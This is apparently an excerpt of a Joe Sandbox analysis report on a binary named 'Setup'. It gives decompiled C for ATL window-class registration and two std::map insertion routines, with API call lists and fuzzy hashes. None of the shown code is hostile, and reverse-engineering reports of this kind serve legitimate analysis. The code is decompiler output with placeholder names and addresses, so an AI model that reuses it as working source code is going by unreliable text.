                                                                                                                                                              • Instruction ID: 34c5fbb723b45cc8b5dfb8bcc746612e15db10846e2642f8c25bc08d6d22922c
                                                                                                                                                              • Opcode Fuzzy Hash: fce5fad9a5188bc65b5fdd797f1f44c65d6c844206c7945e1528684482040bd4
                                                                                                                                                              • Instruction Fuzzy Hash: 6BF16D709042189BCB28EFA5CC55BEEB779AF44304F1085AEE119A72D1DB786F84CF58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00412D60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 141registrywindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00412D60(void* __edi, void* __eflags) {
				struct HINSTANCE__* _v8;
				char _v16;
				char _v24;
				int _v28;
				struct _WNDCLASSEXW _v76;
				signed int _v80;
				signed int _v84;
				struct HINSTANCE__* _v88;
				struct HINSTANCE__* _v92;
				signed int _t62;
				WCHAR* _t70;
				struct HINSTANCE__* _t75;
				WCHAR* _t77;
				void* _t112;
				signed int _t113;
				void* _t117;

				_t117 = __eflags;
				_t111 = __edi;
				_push(0xffffffff);
				_push(0x5183b8);
				_push( *[fs:0x0]);
				_t62 =  *0x561244; // 0xddd124f9
				_push(_t62 ^ _t113);
				 *[fs:0x0] =  &_v16;
				E00416D10( &_v24, 0x5bc850, 0);
				_v8 = 0;
				if(E00416DB0( &_v24, _t117) >= 0) {
					 *0x5c1b04 = RegisterWindowMessageW(L"WM_ATLGETHOST");
					 *0x5c1b08 = RegisterWindowMessageW(L"WM_ATLGETCONTROL");
					_v76.cbSize = 0x30;
					_t70 = E0040B160();
					_v28 = GetClassInfoExW(E004150F0(0x5bc878), _t70,  &_v76);
					__eflags = _v28;
					if(_v28 == 0) {
						_v76.cbSize = 0x30;
						_v76.style = 8;
						_v76.lpfnWndProc =  &M004F1120;
						_v76.cbClsExtra = 0;
						_v76.cbWndExtra = 0;
						_v76.hInstance = E004150F0(0x5bc878);
						_v76.hIcon = 0;
						_v76.hCursor = LoadCursorW(0, 0x7f00);
						_v76.hbrBackground = 6;
						_v76.lpszMenuName = 0;
						_v76.lpszClassName = E0040B160();
						_v76.hIconSm = 0;
						_v80 = RegisterClassExW( &_v76);
						__eflags = _v80 & 0x0000ffff;
						if((_v80 & 0x0000ffff) == 0) {
							_v28 = 0;
						} else {
							E00414570(0x5bc86c, __edi, _t112,  &_v80);
							_v28 = 1;
						}
					}
					__eflags = _v28;
					if(_v28 != 0) {
						E00451D90(_t111,  &_v76, 0, 0x30);
						_v76.cbSize = 0x30;
						_t77 = E00412D50();
						_v28 = GetClassInfoExW(E004150F0(0x5bc878), _t77,  &_v76);
						__eflags = _v28;
						if(_v28 == 0) {
							_v76.cbSize = 0x30;
							_v76.style = 8;
							_v76.lpfnWndProc =  &M004F1DE0;
							_v76.cbClsExtra = 0;
							_v76.cbWndExtra = 0;
							_v76.hInstance = E004150F0(0x5bc878);
							_v76.hIcon = 0;
							_v76.hCursor = LoadCursorW(0, 0x7f00);
							_v76.hbrBackground = 6;
							_v76.lpszMenuName = 0;
							_v76.lpszClassName = E00412D50();
							_v76.hIconSm = 0;
							_v84 = RegisterClassExW( &_v76);
							__eflags = _v84 & 0x0000ffff;
							if((_v84 & 0x0000ffff) == 0) {
								_v28 = 0;
							} else {
								E00414570(0x5bc86c, _t111, _t112,  &_v84);
								_v28 = 1;
							}
						}
					}
					_v92 = _v28;
					_v8 = 0xffffffff;
					E00416D90( &_v24);
					_t75 = _v92;
					goto L12;
				} else {
					_v88 = 0;
					_v8 = 0xffffffff;
					E00416D90( &_v24);
					_t75 = _v88;
					L12:
					 *[fs:0x0] = _v16;
					return _t75;
				}
			}



















                                                                                                                                                              0x00412d60
                                                                                                                                                              0x00412d60
                                                                                                                                                              0x00412d63
                                                                                                                                                              0x00412d65
                                                                                                                                                              0x00412d70
                                                                                                                                                              0x00412d74
                                                                                                                                                              0x00412d7b
                                                                                                                                                              0x00412d7f
                                                                                                                                                              0x00412d8f
                                                                                                                                                              0x00412d94
                                                                                                                                                              0x00412da5
                                                                                                                                                              0x00412dd0
                                                                                                                                                              0x00412de0
                                                                                                                                                              0x00412de5
                                                                                                                                                              0x00412df0
                                                                                                                                                              0x00412e07
                                                                                                                                                              0x00412e0a
                                                                                                                                                              0x00412e0e
                                                                                                                                                              0x00412e14
                                                                                                                                                              0x00412e1b
                                                                                                                                                              0x00412e22
                                                                                                                                                              0x00412e29
                                                                                                                                                              0x00412e30
                                                                                                                                                              0x00412e41
                                                                                                                                                              0x00412e44
                                                                                                                                                              0x00412e58
                                                                                                                                                              0x00412e5b
                                                                                                                                                              0x00412e62
                                                                                                                                                              0x00412e6e
                                                                                                                                                              0x00412e71
                                                                                                                                                              0x00412e82
                                                                                                                                                              0x00412e8a
                                                                                                                                                              0x00412e8c
                                                                                                                                                              0x00412ea5
                                                                                                                                                              0x00412e8e
                                                                                                                                                              0x00412e97
                                                                                                                                                              0x00412e9c
                                                                                                                                                              0x00412e9c
                                                                                                                                                              0x00412e8c
                                                                                                                                                              0x00412eac
                                                                                                                                                              0x00412eb0
                                                                                                                                                              0x00412ebe
                                                                                                                                                              0x00412ec6
                                                                                                                                                              0x00412ed1
                                                                                                                                                              0x00412ee8
                                                                                                                                                              0x00412eeb
                                                                                                                                                              0x00412eef
                                                                                                                                                              0x00412ef5
                                                                                                                                                              0x00412efc
                                                                                                                                                              0x00412f03
                                                                                                                                                              0x00412f0a
                                                                                                                                                              0x00412f11
                                                                                                                                                              0x00412f22
                                                                                                                                                              0x00412f25
                                                                                                                                                              0x00412f39
                                                                                                                                                              0x00412f3c
                                                                                                                                                              0x00412f43
                                                                                                                                                              0x00412f4f
                                                                                                                                                              0x00412f52
                                                                                                                                                              0x00412f63
                                                                                                                                                              0x00412f6b
                                                                                                                                                              0x00412f6d
                                                                                                                                                              0x00412f86
                                                                                                                                                              0x00412f6f
                                                                                                                                                              0x00412f78
                                                                                                                                                              0x00412f7d
                                                                                                                                                              0x00412f7d
                                                                                                                                                              0x00412f6d
                                                                                                                                                              0x00412eef
                                                                                                                                                              0x00412f90
                                                                                                                                                              0x00412f93
                                                                                                                                                              0x00412f9d
                                                                                                                                                              0x00412fa2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00412da7
                                                                                                                                                              0x00412da7
                                                                                                                                                              0x00412dae
                                                                                                                                                              0x00412db8
                                                                                                                                                              0x00412dbd
                                                                                                                                                              0x00412fa5
                                                                                                                                                              0x00412fa8
                                                                                                                                                              0x00412fb3
                                                                                                                                                              0x00412fb3

                                                                                                                                                              APIs
                                                                                                                                                              • RegisterWindowMessageW.USER32(WM_ATLGETHOST,005BC850,00000000,DDD124F9,?,?,?,?,?,?,?,?,?,00000000,005183B8,000000FF), ref: 00412DCA
                                                                                                                                                              • RegisterWindowMessageW.USER32(WM_ATLGETCONTROL,?,?,?,?,?,?,?,?,?,00000000,005183B8,000000FF,?,0040A2D8,00409C40), ref: 00412DDA
                                                                                                                                                              • GetClassInfoExW.USER32 ref: 00412E01
                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00412E52
                                                                                                                                                              • RegisterClassExW.USER32 ref: 00412E7C
                                                                                                                                                              • _memset.LIBCMT ref: 00412EBE
                                                                                                                                                              • GetClassInfoExW.USER32 ref: 00412EE2
                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00412F33
                                                                                                                                                              • RegisterClassExW.USER32 ref: 00412F5D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassRegister$CursorInfoLoadMessageWindow$_memset
                                                                                                                                                              • String ID: 0$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                                              • API String ID: 1979984324-556241384
                                                                                                                                                              • Opcode ID: 98de1ba3a8d8b56333b70a12dcfd8303c53db3e348be417c87b99f726e3b13e3
                                                                                                                                                              • Instruction ID: 258aefe00074db0959d0ba01dbe9fda0cd94ce505775ef1cbfd49d6b95fdbca9
                                                                                                                                                              • Opcode Fuzzy Hash: 98de1ba3a8d8b56333b70a12dcfd8303c53db3e348be417c87b99f726e3b13e3
                                                                                                                                                              • Instruction Fuzzy Hash: AE51E4B0D002099FEB10DFE5D9597EEBFB4FF08305F10411AE505B6290EBB95989CBA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0042B200 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 387memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E0042B200(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v64;
				char _v92;
				intOrPtr _v96;
				signed int _t94;
				intOrPtr* _t103;
				intOrPtr* _t104;
				char* _t107;
				intOrPtr* _t113;
				intOrPtr* _t117;
				char* _t122;
				intOrPtr* _t125;
				intOrPtr* _t134;
				intOrPtr* _t137;
				intOrPtr* _t149;
				char* _t156;
				intOrPtr* _t159;
				intOrPtr* _t168;
				intOrPtr* _t171;
				intOrPtr* _t184;
				intOrPtr* _t187;
				intOrPtr* _t188;
				signed int _t291;
				void* _t292;
				void* _t293;
				void* _t295;
				void* _t300;
				void* _t304;
				void* _t306;
				void* _t323;
				void* _t325;

				_push(0xffffffff);
				_push(0x517298);
				_push( *[fs:0x0]);
				_t293 = _t292 - 0x50;
				_t94 =  *0x561244; // 0xddd124f9
				_push(_t94 ^ _t291);
				 *[fs:0x0] =  &_v16;
				_v96 = __ecx;
				if(E0043B350(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
					E004134D0( &_v92, "map/set<T> too long");
					_v8 = 0;
					E00413D50( &_v92);
					E00456A4C( &_v64, 0x544b50);
					_v8 = 0xffffffff;
					E00413C20( &_v92);
				}
				_v20 = E0043BCD0( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
					__eflags = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) == 0) {
						_t103 = E00441910(_a12);
						_t293 = _t293 + 4;
						 *_t103 = _v20;
						_t104 = E00433720(_v96);
						__eflags = _a12 -  *_t104;
						if(_a12 ==  *_t104) {
							 *((intOrPtr*)(E00433720(_v96))) = _v20;
						}
					} else {
						_t187 = E00415110(_a12);
						_t293 = _t293 + 4;
						 *_t187 = _v20;
						_t188 = E00433680(_v96);
						__eflags = _a12 -  *_t188;
						if(_a12 ==  *_t188) {
							 *((intOrPtr*)(E00433680(_v96))) = _v20;
						}
					}
				} else {
					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
					 *((intOrPtr*)(E00433680(_v96))) = _v20;
					 *((intOrPtr*)(E00433720(_v96))) = _v20;
				}
				_v24 = _v20;
				while(1) {
					_t107 = E0043B340( *((intOrPtr*)(E0042AE30(_v24))));
					_t295 = _t293 + 8;
					if( *_t107 != 0) {
						break;
					}
					_t113 = E0042AE30(_v24);
					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
					_t300 = _t295 + 0x10;
					if( *_t113 !=  *_t117) {
						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t122 = E0043B340(_a12);
						_t304 = _t300 + 0x10;
						__eflags =  *_t122;
						if( *_t122 != 0) {
							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
							_t306 = _t304 + 8;
							__eflags = _v24 -  *_t125;
							if(_v24 ==  *_t125) {
								_t137 = E0042AE30(_v24);
								_t306 = _t306 + 4;
								_v24 =  *_t137;
								E0043BBA0(_v96, __eflags, _v24);
							}
							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t306 + 0x1c;
							E0042B720(_v96, __eflags,  *_t134);
						} else {
							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E0043B340(_a12))) = 1;
							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t304 + 0x20;
							_v24 =  *_t149;
						}
					} else {
						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t156 = E0043B340(_a12);
						_t323 = _t300 + 0x10;
						if( *_t156 != 0) {
							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
							_t325 = _t323 + 8;
							__eflags = _v24 -  *_t159;
							if(_v24 ==  *_t159) {
								_t171 = E0042AE30(_v24);
								_t325 = _t325 + 4;
								_v24 =  *_t171;
								E0042B720(_v96, __eflags, _v24);
							}
							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t325 + 0x1c;
							E0043BBA0(_v96, __eflags,  *_t168);
						} else {
							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E0043B340(_a12))) = 1;
							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t323 + 0x20;
							_v24 =  *_t184;
						}
					}
				}
				 *((char*)(E0043B340( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
				E00445360(_a4, _v20);
				 *[fs:0x0] = _v16;
				return _a4;
			}





































                                                                                                                                                              0x0042b203
                                                                                                                                                              0x0042b205
                                                                                                                                                              0x0042b210
                                                                                                                                                              0x0042b211
                                                                                                                                                              0x0042b215
                                                                                                                                                              0x0042b21c
                                                                                                                                                              0x0042b220
                                                                                                                                                              0x0042b226
                                                                                                                                                              0x0042b23a
                                                                                                                                                              0x0042b244
                                                                                                                                                              0x0042b249
                                                                                                                                                              0x0042b257
                                                                                                                                                              0x0042b265
                                                                                                                                                              0x0042b26a
                                                                                                                                                              0x0042b274
                                                                                                                                                              0x0042b274
                                                                                                                                                              0x0042b299
                                                                                                                                                              0x0042b2a8
                                                                                                                                                              0x0042b2b4
                                                                                                                                                              0x0042b2e3
                                                                                                                                                              0x0042b2e5
                                                                                                                                                              0x0042b31a
                                                                                                                                                              0x0042b31f
                                                                                                                                                              0x0042b325
                                                                                                                                                              0x0042b32a
                                                                                                                                                              0x0042b332
                                                                                                                                                              0x0042b334
                                                                                                                                                              0x0042b341
                                                                                                                                                              0x0042b341
                                                                                                                                                              0x0042b2e7
                                                                                                                                                              0x0042b2eb
                                                                                                                                                              0x0042b2f0
                                                                                                                                                              0x0042b2f6
                                                                                                                                                              0x0042b2fb
                                                                                                                                                              0x0042b303
                                                                                                                                                              0x0042b305
                                                                                                                                                              0x0042b312
                                                                                                                                                              0x0042b312
                                                                                                                                                              0x0042b314
                                                                                                                                                              0x0042b2b6
                                                                                                                                                              0x0042b2c1
                                                                                                                                                              0x0042b2ce
                                                                                                                                                              0x0042b2db
                                                                                                                                                              0x0042b2db
                                                                                                                                                              0x0042b346
                                                                                                                                                              0x0042b349
                                                                                                                                                              0x0042b358
                                                                                                                                                              0x0042b35d
                                                                                                                                                              0x0042b365
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042b36f
                                                                                                                                                              0x0042b393
                                                                                                                                                              0x0042b398
                                                                                                                                                              0x0042b39f
                                                                                                                                                              0x0042b513
                                                                                                                                                              0x0042b51a
                                                                                                                                                              0x0042b51f
                                                                                                                                                              0x0042b525
                                                                                                                                                              0x0042b527
                                                                                                                                                              0x0042b5a7
                                                                                                                                                              0x0042b5ac
                                                                                                                                                              0x0042b5b2
                                                                                                                                                              0x0042b5b4
                                                                                                                                                              0x0042b5ba
                                                                                                                                                              0x0042b5bf
                                                                                                                                                              0x0042b5c4
                                                                                                                                                              0x0042b5ce
                                                                                                                                                              0x0042b5ce
                                                                                                                                                              0x0042b5ea
                                                                                                                                                              0x0042b60f
                                                                                                                                                              0x0042b621
                                                                                                                                                              0x0042b626
                                                                                                                                                              0x0042b62f
                                                                                                                                                              0x0042b529
                                                                                                                                                              0x0042b540
                                                                                                                                                              0x0042b54f
                                                                                                                                                              0x0042b574
                                                                                                                                                              0x0042b586
                                                                                                                                                              0x0042b58b
                                                                                                                                                              0x0042b590
                                                                                                                                                              0x0042b590
                                                                                                                                                              0x0042b3a5
                                                                                                                                                              0x0042b3c9
                                                                                                                                                              0x0042b3d0
                                                                                                                                                              0x0042b3d5
                                                                                                                                                              0x0042b3dd
                                                                                                                                                              0x0042b45d
                                                                                                                                                              0x0042b462
                                                                                                                                                              0x0042b468
                                                                                                                                                              0x0042b46a
                                                                                                                                                              0x0042b470
                                                                                                                                                              0x0042b475
                                                                                                                                                              0x0042b47a
                                                                                                                                                              0x0042b484
                                                                                                                                                              0x0042b484
                                                                                                                                                              0x0042b4a0
                                                                                                                                                              0x0042b4c5
                                                                                                                                                              0x0042b4d7
                                                                                                                                                              0x0042b4dc
                                                                                                                                                              0x0042b4e5
                                                                                                                                                              0x0042b3df
                                                                                                                                                              0x0042b3f6
                                                                                                                                                              0x0042b405
                                                                                                                                                              0x0042b42a
                                                                                                                                                              0x0042b43c
                                                                                                                                                              0x0042b441
                                                                                                                                                              0x0042b446
                                                                                                                                                              0x0042b446
                                                                                                                                                              0x0042b4ea
                                                                                                                                                              0x0042b634
                                                                                                                                                              0x0042b64c
                                                                                                                                                              0x0042b656
                                                                                                                                                              0x0042b661
                                                                                                                                                              0x0042b66d

                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0042B265
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B2B9
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B2C6
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B2D3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B2FB
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B30A
                                                                                                                                                                • Part of subcall function 0043BBA0: HandleT.LIBCPMTD ref: 0043BC34
                                                                                                                                                                • Part of subcall function 0043BBA0: HandleT.LIBCPMTD ref: 0043BC43
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B32A
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B339
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B63C
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 0042B656
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
                                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                                              • API String ID: 3699313741-1285458680
                                                                                                                                                              • Opcode ID: da666a46221a671458d23c4782ba6a436d42f88bd962fc9e5b9cf5cda22c3e0a
                                                                                                                                                              • Instruction ID: b1522afea4ba9fff5600106d295374d53028bac8961b736bbc1883195429486d
                                                                                                                                                              • Opcode Fuzzy Hash: da666a46221a671458d23c4782ba6a436d42f88bd962fc9e5b9cf5cda22c3e0a
                                                                                                                                                              • Instruction Fuzzy Hash: 36E193F5E001549FDB04EFA1E882A6FB375AF98308F14446DE8055B352EB39F911CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00420290 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 387memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00420290(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v64;
				char _v92;
				intOrPtr _v96;
				signed int _t94;
				intOrPtr* _t103;
				intOrPtr* _t104;
				char* _t107;
				intOrPtr* _t113;
				intOrPtr* _t117;
				char* _t122;
				intOrPtr* _t125;
				intOrPtr* _t134;
				intOrPtr* _t137;
				intOrPtr* _t149;
				char* _t156;
				intOrPtr* _t159;
				intOrPtr* _t168;
				intOrPtr* _t171;
				intOrPtr* _t184;
				intOrPtr* _t187;
				intOrPtr* _t188;
				signed int _t291;
				void* _t292;
				void* _t293;
				void* _t295;
				void* _t300;
				void* _t304;
				void* _t306;
				void* _t323;
				void* _t325;

				_push(0xffffffff);
				_push(0x517298);
				_push( *[fs:0x0]);
				_t293 = _t292 - 0x50;
				_t94 =  *0x561244; // 0xddd124f9
				_push(_t94 ^ _t291);
				 *[fs:0x0] =  &_v16;
				_v96 = __ecx;
				if(E00420CF0(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
					E004134D0( &_v92, "map/set<T> too long");
					_v8 = 0;
					E00413D50( &_v92);
					E00456A4C( &_v64, 0x544b50);
					_v8 = 0xffffffff;
					E00413C20( &_v92);
				}
				_v20 = E00420EC0( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
					__eflags = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) == 0) {
						_t103 = E00441910(_a12);
						_t293 = _t293 + 4;
						 *_t103 = _v20;
						_t104 = E00433720(_v96);
						__eflags = _a12 -  *_t104;
						if(_a12 ==  *_t104) {
							 *((intOrPtr*)(E00433720(_v96))) = _v20;
						}
					} else {
						_t187 = E00415110(_a12);
						_t293 = _t293 + 4;
						 *_t187 = _v20;
						_t188 = E00433680(_v96);
						__eflags = _a12 -  *_t188;
						if(_a12 ==  *_t188) {
							 *((intOrPtr*)(E00433680(_v96))) = _v20;
						}
					}
				} else {
					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
					 *((intOrPtr*)(E00433680(_v96))) = _v20;
					 *((intOrPtr*)(E00433720(_v96))) = _v20;
				}
				_v24 = _v20;
				while(1) {
					_t107 = E00420150( *((intOrPtr*)(E0042AE30(_v24))));
					_t295 = _t293 + 8;
					if( *_t107 != 0) {
						break;
					}
					_t113 = E0042AE30(_v24);
					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
					_t300 = _t295 + 0x10;
					if( *_t113 !=  *_t117) {
						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t122 = E00420150(_a12);
						_t304 = _t300 + 0x10;
						__eflags =  *_t122;
						if( *_t122 != 0) {
							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
							_t306 = _t304 + 8;
							__eflags = _v24 -  *_t125;
							if(_v24 ==  *_t125) {
								_t137 = E0042AE30(_v24);
								_t306 = _t306 + 4;
								_v24 =  *_t137;
								E004208B0(_v96, __eflags, _v24);
							}
							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t306 + 0x1c;
							E00420700(_v96, __eflags,  *_t134);
						} else {
							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00420150(_a12))) = 1;
							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t304 + 0x20;
							_v24 =  *_t149;
						}
					} else {
						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t156 = E00420150(_a12);
						_t323 = _t300 + 0x10;
						if( *_t156 != 0) {
							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
							_t325 = _t323 + 8;
							__eflags = _v24 -  *_t159;
							if(_v24 ==  *_t159) {
								_t171 = E0042AE30(_v24);
								_t325 = _t325 + 4;
								_v24 =  *_t171;
								E00420700(_v96, __eflags, _v24);
							}
							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t325 + 0x1c;
							E004208B0(_v96, __eflags,  *_t168);
						} else {
							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00420150(_a12))) = 1;
							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t323 + 0x20;
							_v24 =  *_t184;
						}
					}
				}
				 *((char*)(E00420150( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
				E00445360(_a4, _v20);
				 *[fs:0x0] = _v16;
				return _a4;
			}





































                                                                                                                                                              0x00420293
                                                                                                                                                              0x00420295
                                                                                                                                                              0x004202a0
                                                                                                                                                              0x004202a1
                                                                                                                                                              0x004202a5
                                                                                                                                                              0x004202ac
                                                                                                                                                              0x004202b0
                                                                                                                                                              0x004202b6
                                                                                                                                                              0x004202ca
                                                                                                                                                              0x004202d4
                                                                                                                                                              0x004202d9
                                                                                                                                                              0x004202e7
                                                                                                                                                              0x004202f5
                                                                                                                                                              0x004202fa
                                                                                                                                                              0x00420304
                                                                                                                                                              0x00420304
                                                                                                                                                              0x00420329
                                                                                                                                                              0x00420338
                                                                                                                                                              0x00420344
                                                                                                                                                              0x00420373
                                                                                                                                                              0x00420375
                                                                                                                                                              0x004203aa
                                                                                                                                                              0x004203af
                                                                                                                                                              0x004203b5
                                                                                                                                                              0x004203ba
                                                                                                                                                              0x004203c2
                                                                                                                                                              0x004203c4
                                                                                                                                                              0x004203d1
                                                                                                                                                              0x004203d1
                                                                                                                                                              0x00420377
                                                                                                                                                              0x0042037b
                                                                                                                                                              0x00420380
                                                                                                                                                              0x00420386
                                                                                                                                                              0x0042038b
                                                                                                                                                              0x00420393
                                                                                                                                                              0x00420395
                                                                                                                                                              0x004203a2
